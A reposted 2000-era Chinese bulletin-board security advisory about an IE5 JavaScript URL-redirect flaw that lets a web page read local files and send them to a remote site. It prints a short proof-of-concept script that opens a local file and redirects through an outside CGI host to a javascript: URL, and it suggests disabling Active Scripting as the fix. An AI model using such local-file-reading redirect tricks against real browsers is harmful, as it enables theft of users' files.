发信人: programgirl()
整理人: williamlong(2000-09-20 08:45:58), 站内信件
|
发信人: liukang (雨), 信区: security
标 题: JAVASCRIPT URL重定向漏洞
发信站: 知新园 (Mon Jun 19 18:57:58 2000)
发信人: superoscar (四大皆空), 信区: Hacker
标 题: Javascript的url重定向漏洞
发信站: 华南网木棉站 (Fri Jun 16 23:01:02 2000), 转信
IE5.0存在JAVASCRIPT URL重定向漏洞
漏洞说明:
可以设计一个带有URL重定向漏洞的页面,当IE5用户访问时,可以
读受害人主机的本地文件(或者读用户登录所在网络的任何文件),并通过INTERN ET把内
容发送的所指定的某个地点。
在通常情况下,JAVASCRIPT接受到非本地"安全区域"是不允许执行阅读本地主机 的行为
。在这种情况下,IE5是通过HTTP重定向到JAVASCRIPT所欺骗,以至浏览器认为此 JAVAS
CRIPT执行在本地主机安全区域下。
漏洞代码:
<SCRIPT>
alert("Create a short text file C:\\TEST.TXT and it will be read and s hown i
n a dialog box");
a=window.open("file://c:/test.txt");
a.location="http://www.superoscar.com/reject.cgi?jsredir1";
</SCRIPT>
// ^ 此句是做了个HTTP重定向 "javascript:alert(document.body.inn erText
)"。
解决办法:
关掉ACTIVE SCRIPT。
-- ※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 152.163.194.181]
|
|